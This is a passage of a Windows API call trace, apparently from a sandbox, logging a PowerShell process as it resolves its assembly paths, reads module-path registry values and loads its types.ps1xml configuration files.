returned 0x74 [0138.236] GetLastError () returned 0xcb [0138.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.236] GetLastError () returned 0xcb [0138.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.236] GetLastError () returned 0xcb [0138.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.237] GetLastError () returned 0xcb [0138.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.451] GetLastError () returned 0x3 [0138.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.452] GetLastError () returned 0x3 [0138.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.452] GetLastError () returned 0x3 [0138.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.452] GetLastError () returned 0x3 [0138.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.452] GetLastError () returned 0x3 [0138.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.452] GetLastError () returned 0x3 [0138.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.452] GetLastError () returned 0x3 [0138.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.452] GetLastError () returned 0x3 [0138.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.452] GetLastError () returned 0x3 [0138.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.452] GetLastError () returned 0x3 [0138.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.453] GetLastError () returned 0x3 [0138.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.453] GetLastError () returned 0x3 [0138.474] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0138.474] GetLastError () returned 0x3 [0138.552] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3da558, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0138.552] GetLastError () returned 0x3 [0138.553] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de900 | out: phkResult=0x2de900*=0x344) returned 0x0 [0138.553] RegQueryValueExW (in: hKey=0x344, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x2de944, lpData=0x0, lpcbData=0x2de940*=0x0 | out: lpType=0x2de944*=0x2, lpData=0x0, lpcbData=0x2de940*=0x6c) returned 0x0 [0138.571] RegQueryValueExW (in: hKey=0x344, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x2de944, lpData=0x3da558, lpcbData=0x2de940*=0x6c | out: lpType=0x2de944*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x2de940*=0x6c) returned 0x0 [0138.571] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x3da558, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0138.571] GetLastError () returned 0x3 [0138.571] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3da558, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0138.571] GetLastError () returned 0x3 [0138.572] RegCloseKey (hKey=0x344) returned 0x0 [0138.572] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3da558, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0138.572] GetLastError () returned 0x3 [0138.572] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de900 | out: phkResult=0x2de900*=0x344) returned 0x0 [0138.572] RegQueryValueExW (in: hKey=0x344, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x2de944, lpData=0x0, lpcbData=0x2de940*=0x0 | out: lpType=0x2de944*=0x0, lpData=0x0, lpcbData=0x2de940*=0x0) returned 0x2 [0138.573] RegCloseKey (hKey=0x344) returned 0x0 [0138.727] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3da558 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0138.728] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x2de468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0138.728] GetLastError () returned 0x3f0 [0138.729] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0138.729] GetLastError () returned 0x3f0 [0138.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.736] GetLastError () returned 0xcb [0138.737] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.737] GetLastError () returned 0xcb [0138.898] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.898] GetLastError () returned 0xcb [0138.898] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.898] GetLastError () returned 0xcb [0138.905] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de880 | out: phkResult=0x2de880*=0x34c) returned 0x0 [0138.956] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x2de8e8, lpData=0x0, lpcbData=0x2de8e4*=0x0 | out: lpType=0x2de8e8*=0x1, lpData=0x0, lpcbData=0x2de8e4*=0x74) returned 0x0 [0138.957] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x2de8c8, lpData=0x0, lpcbData=0x2de8c4*=0x0 | out: lpType=0x2de8c8*=0x1, lpData=0x0, lpcbData=0x2de8c4*=0x74) returned 0x0 [0138.958] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x2de8c8, lpData=0x3da558, lpcbData=0x2de8c4*=0x74 | out: lpType=0x2de8c8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x2de8c4*=0x74) returned 0x0 [0138.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x2de448, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0138.958] GetLastError () returned 0xcb [0138.958] SetErrorMode (uMode=0x1) returned 0x1 [0138.958] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x2de8c8 | out: lpFileInformation=0x2de8c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0138.958] GetLastError () returned 0xcb [0138.958] SetErrorMode (uMode=0x1) returned 0x1 [0138.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x2de43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0138.961] GetLastError () returned 0xcb [0138.961] SetErrorMode (uMode=0x1) returned 0x1 [0138.961] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2de8bc | out: lpFileInformation=0x2de8bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0138.961] GetLastError () returned 0xcb [0138.961] SetErrorMode (uMode=0x1) returned 0x1 [0138.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x2de43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0138.965] GetLastError () returned 0xcb [0138.965] SetErrorMode (uMode=0x1) returned 0x1 [0138.965] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2de8bc | out: lpFileInformation=0x2de8bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0138.965] GetLastError () returned 0xcb [0138.965] SetErrorMode (uMode=0x1) returned 0x1 [0139.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.018] GetLastError () returned 0xcb [0139.019] GetACP () returned 0x4e4 [0139.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x2de2cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0139.181] GetLastError () returned 0x2 [0139.181] SetErrorMode (uMode=0x1) returned 0x1 [0139.183] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350 [0139.183] GetLastError () returned 0x0 [0139.184] GetFileType (hFile=0x350) returned 0x1 [0139.184] SetErrorMode (uMode=0x1) returned 0x1 [0139.184] GetFileType (hFile=0x350) returned 0x1 [0139.185] ReadFile (in: hFile=0x350, lpBuffer=0x2cd2ce8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2cd2ce8*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.237] GetLastError () returned 0x0 [0139.237] ReadFile (in: hFile=0x350, lpBuffer=0x2cd2ce8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2cd2ce8*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.237] GetLastError () returned 0x0 [0139.237] ReadFile (in: hFile=0x350, lpBuffer=0x2cd2ce8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2cd2ce8*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.237] GetLastError () returned 0x0 [0139.238] ReadFile (in: hFile=0x350, lpBuffer=0x2cd2ce8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2cd2ce8*, lpNumberOfBytesRead=0x2de834*=0xcf3, lpOverlapped=0x0) returned 1 [0139.238] GetLastError () returned 0x0 [0139.238] ReadFile (in: hFile=0x350, lpBuffer=0x2cd217b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2cd217b*, lpNumberOfBytesRead=0x2de834*=0x0, lpOverlapped=0x0) returned 1 [0139.238] GetLastError () returned 0x0 [0139.238] ReadFile (in: hFile=0x350, lpBuffer=0x2cd2ce8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2cd2ce8*, lpNumberOfBytesRead=0x2de834*=0x0, lpOverlapped=0x0) returned 1 [0139.238] GetLastError () returned 0x0 [0139.239] CloseHandle (hObject=0x350) returned 1 [0139.239] GetLastError () returned 0x0 [0139.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x2de394, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0139.240] GetLastError () returned 0x0 [0139.240] SetErrorMode (uMode=0x1) returned 0x1 [0139.240] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ce405c | out: lpFileInformation=0x2ce405c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0139.240] GetLastError () returned 0x0 [0139.240] SetErrorMode (uMode=0x1) returned 0x1 [0139.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x2de360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0139.278] GetLastError () returned 0x0 [0139.278] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de7b8 | out: phkResult=0x2de7b8*=0x350) returned 0x0 [0139.278] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de800, lpData=0x0, lpcbData=0x2de7fc*=0x0 | out: lpType=0x2de800*=0x1, lpData=0x0, lpcbData=0x2de7fc*=0x56) returned 0x0 [0139.278] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de800, lpData=0x3da558, lpcbData=0x2de7fc*=0x56 | out: lpType=0x2de800*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2de7fc*=0x56) returned 0x0 [0139.279] RegCloseKey (hKey=0x350) returned 0x0 [0139.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x2de360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0139.279] GetLastError () returned 0x0 [0139.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x2de2f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0139.279] GetLastError () returned 0x0 [0139.434] GetSystemInfo (in: lpSystemInfo=0x2ddf38 | out: lpSystemInfo=0x2ddf38*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0139.436] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x2de2cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0139.510] GetLastError () returned 0x0 [0139.510] SetErrorMode (uMode=0x1) returned 0x1 [0139.510] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350 [0139.511] GetLastError () returned 0x0 [0139.511] GetFileType (hFile=0x350) returned 0x1 [0139.511] SetErrorMode (uMode=0x1) returned 0x1 [0139.511] GetFileType (hFile=0x350) returned 0x1 [0139.511] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.796] GetLastError () returned 0x0 [0139.797] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.811] GetLastError () returned 0x0 [0139.811] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.811] GetLastError () returned 0x0 [0139.812] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.812] GetLastError () returned 0x0 [0139.812] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.812] GetLastError () returned 0x0 [0139.812] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.812] GetLastError () returned 0x0 [0139.812] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.812] GetLastError () returned 0x0 [0139.812] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.812] GetLastError () returned 0x0 [0139.813] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.813] GetLastError () returned 0x0 [0139.813] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.813] GetLastError () returned 0x0 [0139.813] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.813] GetLastError () returned 0x0 [0139.814] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.814] GetLastError () returned 0x0 [0139.814] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.814] GetLastError () returned 0x0 [0139.814] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.814] GetLastError () returned 0x0 [0139.814] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, 